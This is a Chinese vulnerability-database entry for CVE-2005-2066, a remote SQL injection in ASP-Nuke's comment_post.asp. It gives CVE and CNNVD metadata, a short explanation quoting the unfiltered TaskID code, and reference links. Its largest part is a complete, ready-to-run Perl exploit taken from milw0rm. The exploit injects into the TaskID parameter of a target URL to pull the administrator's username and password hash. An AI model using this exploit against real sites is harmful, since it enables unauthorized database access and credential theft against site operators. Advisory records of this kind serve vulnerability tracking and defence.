ASP-Nuke ‘comment_post.asp’远程SQL注入漏洞

ASP-Nuke ‘comment_post.asp’远程SQL注入漏洞

漏洞ID 1108897 漏洞类型 SQL注入
发布时间 2005-06-27 更新时间 2005-10-20
图片[1]-ASP-Nuke ‘comment_post.asp’远程SQL注入漏洞-安全小百科CVE编号 CVE-2005-2066
图片[2]-ASP-Nuke ‘comment_post.asp’远程SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200506-222
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-222
|漏洞详情
ASP-Nuke是一款开放源码的软件应用,可在WebServer上运行基于社区的站点。ASP-Nuke中存在SQL注入漏洞,远程攻击者可以利用此漏洞非授权访问数据库。起因是没有正确的过滤用户输入。请看/module/support/task/comment_post.asp的第36行和第75行代码:…nTaskID=steNForm(“TaskID”)…IfsErrorMsg=””Then’preventduppostingheresStat=”SELECTTaskID”&_”FROMtblTaskComment”&_”WHERETaskID=”&nTaskID&””&_”ANDSubject='”&Replace(sSubject,”‘”,”””)&”‘”&_”ANDBodyLIKE'”&Replace(sBody,”‘”,”””)&”‘”…?>可见对TaskID参数没有任何控制,而该参数的值未经过滤便放到了SQL查询中,导致SQL注入攻击。成功利用这个漏洞的攻击者可以完全控制基础数据库系统。
|漏洞EXP
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieve the username of the administrator of the board and his password crypted in SHA256
# Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "nt===============================n";
print "t= Exploit for ASPNuke <= 0.80 =n";
print "t=     by Alberto Trivero      =n";
print "t===============================nn";

if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
   print "Usage:nperl $0 [full_target_path]nnExamples:nperl $0 http://www.example.com/aspnuke/n";
   exit(0);
}

$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Username") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]n";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin is: $1n";
print "[-] Unable to retrieve Usernamen" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1n";
print "[-] Unable to retrieve hash of passwordn" if(!$1);

# milw0rm.com [2005-06-27]
|参考资料

来源:BID
名称:14064
链接:http://www.securityfocus.com/bid/14064
来源:BUGTRAQ
名称:20050626M4DR007-07SA(securityadvisory):MultiplevulnerabilitiesinASPNuke0.80
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111989223906484&w;=2
来源:BUGTRAQ
名称:20050627SQLInjectionExploitforASPNuke<=0.80
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111999188612055&w;=2

相关推荐: Adobe Macromedia ColdFusion MX/ JRun 权限提升漏洞

Adobe Macromedia ColdFusion MX/ JRun 权限提升漏洞 漏洞ID 1198618 漏洞类型 未知 发布时间 2005-07-19 更新时间 2005-07-19 CVE编号 CVE-2005-2306 CNNVD-ID CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享